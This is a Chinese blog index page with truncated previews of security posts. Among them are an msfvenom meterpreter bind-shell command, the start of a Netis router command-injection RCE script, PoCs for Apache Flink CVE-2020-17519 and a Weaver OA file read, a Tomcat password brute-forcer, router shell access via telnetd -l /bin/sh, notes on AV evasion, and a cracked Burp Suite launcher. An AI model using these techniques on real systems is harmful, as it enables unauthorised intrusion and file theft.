1want0-优快云博客

原创解决bp抓包隐藏启动脚本

import os,subprocesss='java -Dfile.encoding=utf-8 -javaagent:BurpSuiteCn.jar -Xbootclasspath/p:burp-loader-keygen.jar -Xmx2048m -jar burpsuite_pro_v1.7.37.jar'CREATE_NO_WINDOW = 0x08000000subprocess.call(s, creationflags=CREATE_NO_WINDOW)

2021-11-26 17:29:43 691

原创 Windows10 x64 获取PEB表，并获取ntdll基址

1.Windows通过TEB封装信息,TEB中包含PEB表,如图:具体过程是从teb->peb->ldr->InInitializationOrderModuleList->dll模块基址,经过一系列的结构体偏移得到模块初始化装载顺序.2.dt _TEB 可以看到PEB表偏移kd> dt _TEBnt!_TEB +0x000 NtTib : _NT_TIB +0x038 EnvironmentPointer : Ptr64

2021-10-31 16:58:12 3624

原创 win7镜像问题解决

镜像下载https://msdn.itellyou.cn/win7 sp1 vmtools无法安装解救方案https://www.fujieace.com/vmware/virtual-machine-communication-interface.html

2021-10-19 09:21:42 256

原创详细IP地址

私有IP地址段：A类：10.0.0.0到10.255.255.255 1658万个B类：172.16.0.0到172.31.255.255 97.5万个C类：192.168.0.0到192.168.255.25 6.5万个公网IP地址段：A类：1.0.0.0----9.255.255.255 1.5亿个11.0.0.0-----126.255.255.255 19.07亿个B类：128.0.0.0-----172.15.255.255 0.43亿个172.32.0.0-----191.255

2021-10-07 17:09:01 623

原创 msf linux/x64/meterpreter/bind_tcp记录实践

1.设置监听,从tcp的角度来,要服务端先启动,客户端才能连接.生成payload,赋权并执行root@kali:~# msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=223 -f elf>x[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload[-] No arch selected, selecting arch: x

2021-10-07 06:50:56 2060

原创自动化F搜索引擎

1.留个小算法障目代码如下:import requests,os,base64,re,json,threadingheaders = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36",}data=['eijing','hanghai','ianjin','hongqi

2021-10-07 03:10:05 1936

原创对某个路由器的分析,获取相应的权限

1.该博客是对之前学习的记录总结2.打开路由器web界面如下尝试使用命令注入注入成功3.杀死原先系统启动的telnetd进程后注入该命令telnetd -l /bin/sh本地telnet连接成功获得一个shell4.尝试分析配置目录etc和etc_pro,发现启动脚本如下:通过百度谷歌搜寻发现rcS为启动脚本并找到相应的telnet脚本,密码5.重启路由器,并使用脚本用户名和密码连接连接成功....

2021-08-04 02:26:33 227

原创 IDA+VM调试分析主引导区病毒key加密算法

#1.修改虚拟机vmx配置,后面附加上debugStub.listen.guest32 = "TRUE"debugStub.hideBreakpoints = "TRUE"bios.bootDelay = "12000"bios.bootDelay = “12000” 表示12s延时等待IDA远程连接调试,默认端口为8832.#2.因为IDA默认反汇编是32位,而MBR是16位汇编代码,所以需要调整#3.在mbr载入内存处0x7c00处下断点#4....

2021-08-04 02:04:37 822

原创 Netis路由器ping命令字符缺陷远程代码执行

代码如下:import requests,jsonimport reimport timeimport urllibdef Two(h,p,cmd): host = h +':' + p headers1={'Host':host, 'Cache-Control':'no-cache', 'Content-Type':'application/x-www-form-urlencoded', 'User-A

2021-02-07 16:15:39 1113

原创 Python 对公司api接口数据爬处理json

使用for循环逐个测试,代码如下:import requests,jsonfrom openpyxl import load_workbookfile = 'xxx.xlsx'wb = load_workbook(file) # 打开文件ws = wb.active # 激活 worksheetdef data_wr(i): try: strr,strq,strt,st

2021-02-06 12:20:12 334 2

原创 AttifyOS v3.0 路由qemu模拟环境的使用

1.打开环境是这样的2.修改root密码为attify直接使用3.运行python3 fat.py 固件后,qemu模拟器自动开启运行,固件使用自带目录下的zip文件,运行成功如下:

2021-01-31 02:25:35 3269 13

原创 Python实现tomcat密码破解

1.原理就是对tomcat毫无限制的密码访问依然有所响应,根据返回字符串进行判断识别代码如下:import requestsimport base64def bp(ip,port): try: print(ip) bp1(ip,port) url = 'http://'+ip+':'+port+'/manager/html' with open("passwd.txt", "r") as f: w

2021-01-21 17:14:28 275

原创 CVE-2020-17519复现

Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。#!/usr/bin/env python# coding:utf-8# author:B1anda0#affected versions are Apache Flink 1.11.0-1.11.2import requests,sys,coloramaimport refrom time i

2021-01-11 17:59:56 249

原创 Python实现对word文档添加密码去除密码

代码实现如下:import win32com.client,os,timedef word_encryption(path, password): # 若加密保存.docx时，覆盖原文件，则无法成功添加密码。但是保存为另一个文件名，则可以添加密码。 # 因此将A存为B，删A，再将B改为A。 dirname, tempname = os.path.split(path) path_temp = os.path.join(dirname, tempname) w

2020-12-27 00:01:52 4065 6

原创 Python实现泛微OA云桥未授权任意文件读取

1.代码如下:import requestsimport jsonfrom multiprocessing import Pool, Managerdef two(host,id,dirstr): s=requests.get(url=host+'/file/fileNoLogin/'+id,verify=False, timeout=5) if ('/bin/bash' in s.text and 'root' in s.text) or 'bit' in s.text:.

2020-12-21 12:08:18 728 1

翻译 Android Pentest实验室设置和ADB命令速查表

https://www.hackingarticles.in/android-pentest-lab-setup-adb-command-cheatsheet/

2020-12-09 10:23:37 223

原创 Python实现调用钟馗之眼api查询

代码如下:import requests, jsonaccess_token = ''ip_list = []def saveListToFile(file, list): """ 将列表逐行写如文件中 :return: """ s = '\n'.join(list) with open(file, 'w') as (output): output.write(s)def apiTest(): """

2020-12-01 14:59:21 1020 1

原创 Python 发送QQ邮件实现

代码如下:import smtplibfrom email.mime.text import MIMETextfrom email.mime.multipart import MIMEMultipartclass Send: def __init__(self): self.send_user = '123@qq.com' self.password = 'zhmvcnhybuiqeajj' self.email_host = 'smtp

2020-12-01 14:42:21 289

翻译 (笔记)msf payload加载器源码绕过火绒的一次测试

代码:/* * A C-based stager client compat with the Metasploit Framework * based on a discussion on the Metasploit Framework mailing list * * @author Raphael Mudge (raffi@strategiccyber.com) * @license BSD License. * * Relevant messages: * * http

2020-12-01 10:09:14 543

原创 Python对json数据的提取

代码如下:import jsonwith open('test.json', 'r', encoding = 'utf-8') as f: for jsonstr in f.readlines(): data = json.loads(jsonstr) S1 = data['ip'] S2 = data['port'] print(S1+':'+str(S2))

2020-12-01 09:56:53 381

原创 Python端口多线程扫描

直接上代码:import timeimport socketimport ipaddressimport refrom time import sleepfrom multiprocessing import Pool, Managerdef TCP_connect(ip,port): """模拟TCP连接""" TCP_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) TCP_sock.settim

2020-12-01 09:51:11 204

原创 Python计算文件crc32值

1.源于一次对路由器的分析,做个笔记,代码如下:import zlibhash = 0def crc32(file_path): """ 计算文件 crc32 hash 值 """ with open(file_path, 'rb') as fh: global hash while True: s = fh.read(65535) #print(s)

2020-12-01 09:21:50 5175

原创 Python 对地址提取经纬度设计

直接上代码import requestsimport sysimport reimport stringimport urllib.parsefrom openpyxl import load_workbookfrom urllib.parse import quoterequests.packages.urllib3.disable_warnings()def FIND(string): #定义两个变量：分别表示开始的字符串，结束的字符串 start1 = '".

2020-11-27 18:17:33 320 1

原创 Python对excel表格读写操作

1.测试代码如下:# -*- coding-8 -*-from openpyxl import *def data_wr(r,c,data): print(ws.cell(row=r, column=c).value) #读取 ws.cell(row=r, column=c).value = data wb.save(file) #写入if __name__ == '__main__': file .

2020-11-27 16:02:29 267 2

原创安卓实现远程自动截屏

1.为了解决开发的便利,实现远程传输屏幕截图,而不用在第三方软件转来转去,特此实现远程截屏#需获取root,终端使用命令如下setprop service.adb.tcp.port 5555stop adbdstart adbd2.测试连接3.截屏代码保存为batC:\adb shell screencap -p /data/local/tmp/01.pngC:\adb pull /data/local/tmp/01.png C:\Users\Administrator\De

2020-11-26 10:04:16 1604

原创对excel两行IP地址重复次数计算的一次算法设计

1.原始数据2.算法设计import csvdef list21csv(csv_l): file_path='re.csv' try: fp = open(file_path, 'w') for items in csv_l: for i in range(len(items)): # 若元素中含有逗号，那么需要加双引号 if items[i].fin.

2020-11-17 11:54:36 460

原创 python多线程检测socks5代理

```pythonimport requestsimport refrom time import sleepfrom multiprocessing import Pool, Manager#from requests_html import HTMLSessiondef test_ip(ip,port): #print (ip) try: #requests.get('http://www.baidu.com/', proxies={"http":"http.

2020-09-17 14:17:20 3701

want的博客